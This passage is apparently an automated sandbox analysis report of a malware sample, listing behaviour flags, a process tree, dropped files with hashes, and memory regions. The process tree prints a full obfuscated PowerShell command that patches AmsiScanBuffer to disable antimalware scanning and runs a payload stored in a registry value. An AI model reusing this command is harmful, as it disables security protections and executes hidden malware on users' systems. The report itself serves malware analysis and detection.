- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:PDKCFKaLciFa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nPGlvOOlRbfUeE,[Parameter(Position=1)][Type]$dOwHteKNOV)$TIEBqmOtZtN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$TIEBqmOtZtN.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$nPGlvOOlRbfUeE).SetImplementationFlags('Runtime,Managed');$TIEBqmOtZtN.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$dOwHteKNOV,$nPGlvOOlRbfUeE).SetImplementationFlags('Runtime,Managed');Write-Output $TIEBqmOtZtN.CreateType();}$FMUDbRxvjRBFg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$gFyjbsHYScgJWk=$FMUDbRxvjRBFg.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ryUsbFelQjQewlPwyYR=PDKCFKaLciFa @([String])([IntPtr]);$dBcgFRtSkVBbaHzHUioELX=PDKCFKaLciFa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FflEYrwvqNH=$FMUDbRxvjRBFg.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$WOSfIvmqBHkcQo=$gFyjbsHYScgJWk.Invoke($Null,@([Object]$FflEYrwvqNH,[Object]('Load'+'LibraryA')));$ZdkRRKjXecDCthYRh=$gFyjbsHYScgJWk.Invoke($Null,@([Object]$FflEYrwvqNH,[Object]('Vir'+'tual'+'Pro'+'tect')));$TrJFXld=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WOSfIvmqBHkcQo,$ryUsbFelQjQewlPwyYR).Invoke('a'+'m'+'si.dll');$rCQJGeOqIUvHaYzzg=$gFyjbsHYScgJWk.Invoke($Null,@([Object]$TrJFXld,[Object]('Ams'+'iSc'+'an'+'Buffer')));$HtlpzxTmkJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZdkRRKjXecDCthYRh,$dBcgFRtSkVBbaHzHUioELX).Invoke($rCQJGeOqIUvHaYzzg,[uint32]8,4,[ref]$HtlpzxTmkJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$rCQJGeOqIUvHaYzzg,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZdkRRKjXecDCthYRh,$dBcgFRtSkVBbaHzHUioELX).Invoke($rCQJGeOqIUvHaYzzg,[uint32]8,0x20,[ref]$HtlpzxTmkJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD769.tmp.csvFilesize
32KB
MD5ce8207bcd219f0d00907077818407f38
SHA10277f4e37b2e99c70aa1c0a09a58067e61a001ff
SHA25672237936beb5faea307e7c83982936e3991dfb6cca7fe6fc9ad1f4b49b33c291
SHA5128386a72207db766cfe2fc2a7941b109ec978d7bb9eb9c3395c887216f03d95d4d4affa7edc926d4acc6516988a0f84885bad37ac8a9d0bb2d9d18f8fe6859cbe
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD789.tmp.txtFilesize
12KB
MD5d093d2b0231596d7021c2b541ffc3ea3
SHA1e92b025f424cda476aacf025091639725d82af9a
SHA25618e3daaed59c0b99b24e6edec6a5f55cb79a48f4dee7ba1e703698137f91b5a2
SHA512c7a97a2a186660d0264473ff4b8946a647c921595e96c6f4eb1c4328bfafd715a1a0dda2596f16ee55cf00bc7cf6b7487449facdde976a145de8b8ea97d5e0a2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD99E.tmp.csvFilesize
31KB
MD5f1744a85f72e914d1e2da581420a4b3a
SHA1f0866f6d9903342b9bfa1d89c1320497095dd663
SHA256619f72ebdba37ca5b1f86d901b1f1e597aa36844a9642fe1c9c31ada2e24ae29
SHA5129551dce274dc32815741cba44951b235b20956d28aba73a405885174ecfaa7a139637e687bf01cfa2497fc625a1d118a4b9b6b2c2c3ab5d312fa24ad1dcc722b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9ED.tmp.txtFilesize
12KB
MD5f24d741c380cef8793273beafd508c04
SHA138f64e3b936cf0e8d82e0ad90d78751384a30bfc
SHA256e5630b16d954efbf4e8bc63be702a02d5dbcc28aab3fd1327bd2f4cb7c845880
SHA51255c33d6882b070f3e9ecad042cb4b85608c7871d26fe5c8d8e125abb852510de27f1bb8de69728f51d88d4e288d12b8a89ecdf470da6c7a08abd0d63b9637ea4
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD5f45d46b20b2f149cd2cfba6b1bd00f5f
SHA15e98894e4fdba7142eeb7c6634d5eeb110acb594
SHA256457a1ba49a120abd7d7ff591e0c9cd4e68fbe5fd6bfb0c7a57a909885bf631cd
SHA51288739f65b1dd634b6e0ec6f7183951d5b67ed2be23fefeef408b69a5b2c73116c4102daa9f19ef5fab1e2dcccec8869cf87f5b0dc525646fce9103743325b68c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d6d638481a22ebacf7d77520808e69
SHA1113b88ed15de8bf6ffe5f465f2c3b3c7b4cb8456
SHA256cb2d81b082b9bdc8c1c898c301faa7215fd9c9d46b5addb033f666874df6a566
SHA512a1193cda72c94538fa3fcbf0402fcd23dd38d7dbd0bbe93b963b9953ea37c895ba94736df03833a939000a012e3ca48a4ea2a9552a6fc87bdfa50363323a80be
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD5258534f009540a1b82120c82cd9e697e
SHA13243d37c9b3424f261663c7d8b4f8781c3925c8e
SHA256a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505
SHA512d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeFilesize
2.2MB
MD5258534f009540a1b82120c82cd9e697e
SHA13243d37c9b3424f261663c7d8b4f8781c3925c8e
SHA256a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505
SHA512d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945
-
memory/60-335-0x000001D0E45D0000-0x000001D0E45FA000-memory.dmpFilesize
168KB
-
memory/60-260-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/96-245-0x0000000000000000-mapping.dmp
-
memory/164-541-0x0000000000000000-mapping.dmp
-
memory/188-243-0x0000000000000000-mapping.dmp
-
memory/192-244-0x0000000000000000-mapping.dmp
-
memory/196-533-0x0000000000000000-mapping.dmp
-
memory/208-538-0x0000000000000000-mapping.dmp
-
memory/316-397-0x0000000000000000-mapping.dmp
-
memory/404-368-0x0000000000000000-mapping.dmp
-
memory/404-226-0x0000000000000000-mapping.dmp
-
memory/436-261-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/436-336-0x000001B6596B0000-0x000001B6596DA000-memory.dmpFilesize
168KB
-
memory/588-253-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/588-257-0x0000027CC1100000-0x0000027CC1123000-memory.dmpFilesize
140KB
-
memory/588-304-0x0000027CC1130000-0x0000027CC115A000-memory.dmpFilesize
168KB
-
memory/624-338-0x000002BA9DEF0000-0x000002BA9DF1A000-memory.dmpFilesize
168KB
-
memory/624-263-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/640-254-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/640-305-0x000002670B870000-0x000002670B89A000-memory.dmpFilesize
168KB
-
memory/700-337-0x0000022889FD0000-0x0000022889FFA000-memory.dmpFilesize
168KB
-
memory/700-262-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/724-333-0x0000027385DD0000-0x0000027385DFA000-memory.dmpFilesize
168KB
-
memory/724-258-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/904-334-0x000001E962930000-0x000001E96295A000-memory.dmpFilesize
168KB
-
memory/904-259-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/988-319-0x000002054D270000-0x000002054D29A000-memory.dmpFilesize
168KB
-
memory/988-255-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1012-182-0x0000000000000000-mapping.dmp
-
memory/1028-189-0x0000000000000000-mapping.dmp
-
memory/1092-339-0x000002AFD04D0000-0x000002AFD04FA000-memory.dmpFilesize
168KB
-
memory/1092-264-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1112-265-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1112-341-0x000001E6B9D50000-0x000001E6B9D7A000-memory.dmpFilesize
168KB
-
memory/1132-237-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1132-249-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1132-250-0x00007FF8E0320000-0x00007FF8E04FB000-memory.dmpFilesize
1.9MB
-
memory/1132-239-0x00007FF8DE280000-0x00007FF8DE32E000-memory.dmpFilesize
696KB
-
memory/1132-234-0x00000001400024C8-mapping.dmp
-
memory/1132-238-0x00007FF8E0320000-0x00007FF8E04FB000-memory.dmpFilesize
1.9MB
-
memory/1132-236-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1132-231-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1136-251-0x0000000000000000-mapping.dmp
-
memory/1140-359-0x0000000000000000-mapping.dmp
-
memory/1140-364-0x00000000001B0000-0x00000000001DA000-memory.dmpFilesize
168KB
-
memory/1156-355-0x0000000001410000-0x000000000143A000-memory.dmpFilesize
168KB
-
memory/1156-275-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1192-343-0x0000020795FD0000-0x0000020795FFA000-memory.dmpFilesize
168KB
-
memory/1192-266-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1236-267-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1236-344-0x0000020C935D0000-0x0000020C935FA000-memory.dmpFilesize
168KB
-
memory/1252-268-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1252-346-0x000002C73A9A0000-0x000002C73A9CA000-memory.dmpFilesize
168KB
-
memory/1264-347-0x000001FDD4990000-0x000001FDD49BA000-memory.dmpFilesize
168KB
-
memory/1264-269-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1396-270-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1396-348-0x000001FFA29D0000-0x000001FFA29FA000-memory.dmpFilesize
168KB
-
memory/1424-271-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1424-349-0x00000278A26B0000-0x00000278A26DA000-memory.dmpFilesize
168KB
-
memory/1444-350-0x0000015E840C0000-0x0000015E840EA000-memory.dmpFilesize
168KB
-
memory/1444-272-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1520-316-0x000001B1873A0000-0x000001B1873CA000-memory.dmpFilesize
168KB
-
memory/1520-309-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1532-353-0x000001E249590000-0x000001E2495BA000-memory.dmpFilesize
168KB
-
memory/1532-273-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1540-354-0x00000156A6710000-0x00000156A673A000-memory.dmpFilesize
168KB
-
memory/1540-274-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1556-529-0x0000000000000000-mapping.dmp
-
memory/1596-284-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1632-282-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1644-281-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1704-514-0x0000000000000000-mapping.dmp
-
memory/1788-280-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1788-367-0x0000021827F40000-0x0000021827F6A000-memory.dmpFilesize
168KB
-
memory/1796-283-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1832-279-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1832-363-0x000002296DF80000-0x000002296DFAA000-memory.dmpFilesize
168KB
-
memory/1848-235-0x0000000000000000-mapping.dmp
-
memory/1852-277-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1852-357-0x00000208ADBA0000-0x00000208ADBCA000-memory.dmpFilesize
168KB
-
memory/1880-550-0x0000000000000000-mapping.dmp
-
memory/1916-278-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/1916-358-0x000001FCA1490000-0x000001FCA14BA000-memory.dmpFilesize
168KB
-
memory/1944-198-0x0000000000000000-mapping.dmp
-
memory/1980-187-0x0000000000000000-mapping.dmp
-
memory/2052-276-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2052-356-0x0000029E57AB0000-0x0000029E57ADA000-memory.dmpFilesize
168KB
-
memory/2060-314-0x000002075DAD0000-0x000002075DAFA000-memory.dmpFilesize
168KB
-
memory/2060-329-0x000002075DB60000-0x000002075DB8A000-memory.dmpFilesize
168KB
-
memory/2060-312-0x0000000000000000-mapping.dmp
-
memory/2060-313-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2176-285-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2184-286-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2224-194-0x0000000000000000-mapping.dmp
-
memory/2244-407-0x0000000000000000-mapping.dmp
-
memory/2336-178-0x0000000000000000-mapping.dmp
-
memory/2344-497-0x0000000000000000-mapping.dmp
-
memory/2356-246-0x0000000000000000-mapping.dmp
-
memory/2372-553-0x0000000000000000-mapping.dmp
-
memory/2504-287-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2512-288-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2520-297-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2532-306-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2532-168-0x0000000000000000-mapping.dmp
-
memory/2532-308-0x00000288AED10000-0x00000288AED3A000-memory.dmpFilesize
168KB
-
memory/2624-296-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2636-295-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2648-294-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2724-436-0x0000000000000000-mapping.dmp
-
memory/2736-293-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2792-292-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2824-298-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2832-291-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/2948-302-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/3012-130-0x0000000000000000-mapping.dmp
-
memory/3052-290-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/3168-256-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/3168-332-0x0000000000850000-0x000000000087A000-memory.dmpFilesize
168KB
-
memory/3176-123-0x0000026271940000-0x0000026271B7B000-memory.dmpFilesize
2.2MB
-
memory/3176-317-0x0000026274310000-0x0000026274553000-memory.dmpFilesize
2.3MB
-
memory/3176-124-0x0000026274310000-0x0000026274534000-memory.dmpFilesize
2.1MB
-
memory/3176-179-0x00000262742D0000-0x00000262742E2000-memory.dmpFilesize
72KB
-
memory/3176-121-0x0000026274560000-0x000002627479C000-memory.dmpFilesize
2.2MB
-
memory/3176-181-0x00000262742F0000-0x00000262742F6000-memory.dmpFilesize
24KB
-
memory/3176-320-0x0000026274B40000-0x0000026274B6A000-memory.dmpFilesize
168KB
-
memory/3212-200-0x0000000000000000-mapping.dmp
-
memory/3340-195-0x0000000000000000-mapping.dmp
-
memory/3476-180-0x0000000000000000-mapping.dmp
-
memory/3524-177-0x0000000000000000-mapping.dmp
-
memory/3608-289-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/3800-299-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/3852-489-0x0000000000000000-mapping.dmp
-
memory/3876-485-0x0000000000000000-mapping.dmp
-
memory/3924-190-0x0000000000000000-mapping.dmp
-
memory/4036-310-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/4036-311-0x000001EDCFA00000-0x000001EDCFA2A000-memory.dmpFilesize
168KB
-
memory/4080-303-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/4192-169-0x0000000000000000-mapping.dmp
-
memory/4200-225-0x000001EAF9A50000-0x000001EAF9A8C000-memory.dmpFilesize
240KB
-
memory/4200-227-0x00007FF8E0320000-0x00007FF8E04FB000-memory.dmpFilesize
1.9MB
-
memory/4200-233-0x00007FF8DE280000-0x00007FF8DE32E000-memory.dmpFilesize
696KB
-
memory/4200-230-0x00007FF8E0320000-0x00007FF8E04FB000-memory.dmpFilesize
1.9MB
-
memory/4200-228-0x00007FF8DE280000-0x00007FF8DE32E000-memory.dmpFilesize
696KB
-
memory/4216-204-0x0000000000000000-mapping.dmp
-
memory/4236-492-0x0000000000000000-mapping.dmp
-
memory/4244-318-0x0000000000000000-mapping.dmp
-
memory/4244-325-0x0000017A19210000-0x0000017A1923A000-memory.dmpFilesize
168KB
-
memory/4268-242-0x0000000000000000-mapping.dmp
-
memory/4272-197-0x0000000000000000-mapping.dmp
-
memory/4280-196-0x0000000000000000-mapping.dmp
-
memory/4328-345-0x0000000000000000-mapping.dmp
-
memory/4328-352-0x00000200183E0000-0x000002001840A000-memory.dmpFilesize
168KB
-
memory/4360-521-0x0000000000000000-mapping.dmp
-
memory/4420-191-0x0000000000000000-mapping.dmp
-
memory/4484-301-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/4488-326-0x000001B6BE650000-0x000001B6BE67A000-memory.dmpFilesize
168KB
-
memory/4488-323-0x000001B6BE600000-0x000001B6BE62A000-memory.dmpFilesize
168KB
-
memory/4488-321-0x0000000000000000-mapping.dmp
-
memory/4504-131-0x0000000000000000-mapping.dmp
-
memory/4504-136-0x000001ACE1D40000-0x000001ACE1D62000-memory.dmpFilesize
136KB
-
memory/4504-140-0x000001ACE2830000-0x000001ACE28A6000-memory.dmpFilesize
472KB
-
memory/4572-205-0x0000000000000000-mapping.dmp
-
memory/4592-199-0x0000000000000000-mapping.dmp
-
memory/4600-487-0x0000000000000000-mapping.dmp
-
memory/4616-222-0x0000000006790000-0x0000000006DB8000-memory.dmpFilesize
6.2MB
-
memory/4616-219-0x0000000006020000-0x0000000006056000-memory.dmpFilesize
216KB
-
memory/4616-252-0x0000000007A60000-0x0000000007AD6000-memory.dmpFilesize
472KB
-
memory/4616-248-0x00000000077A0000-0x00000000077EB000-memory.dmpFilesize
300KB
-
memory/4616-247-0x00000000071C0000-0x00000000071DC000-memory.dmpFilesize
112KB
-
memory/4616-240-0x0000000007330000-0x0000000007680000-memory.dmpFilesize
3.3MB
-
memory/4616-232-0x0000000007150000-0x00000000071B6000-memory.dmpFilesize
408KB
-
memory/4616-229-0x0000000006FB0000-0x0000000007016000-memory.dmpFilesize
408KB
-
memory/4616-223-0x0000000006630000-0x0000000006652000-memory.dmpFilesize
136KB
-
memory/4624-518-0x0000000000401BEA-mapping.dmp
-
memory/4648-526-0x0000000000000000-mapping.dmp
-
memory/4672-438-0x0000000000000000-mapping.dmp
-
memory/4716-454-0x0000000000000000-mapping.dmp
-
memory/4756-188-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4756-184-0x0000000140002348-mapping.dmp
-
memory/4756-186-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4756-192-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4756-183-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4796-185-0x0000000000000000-mapping.dmp
-
memory/4844-360-0x00000210E8E50000-0x00000210E8E7A000-memory.dmpFilesize
168KB
-
memory/4844-307-0x0000000000000000-mapping.dmp
-
memory/4844-328-0x00000210E70E0000-0x00000210E710A000-memory.dmpFilesize
168KB
-
memory/4860-176-0x0000000000000000-mapping.dmp
-
memory/4884-193-0x0000000000000000-mapping.dmp
-
memory/4912-203-0x0000000000000000-mapping.dmp
-
memory/4928-300-0x00007FF8A03B0000-0x00007FF8A03C0000-memory.dmpFilesize
64KB
-
memory/4988-201-0x0000000000000000-mapping.dmp
-
memory/4992-202-0x0000000000000000-mapping.dmp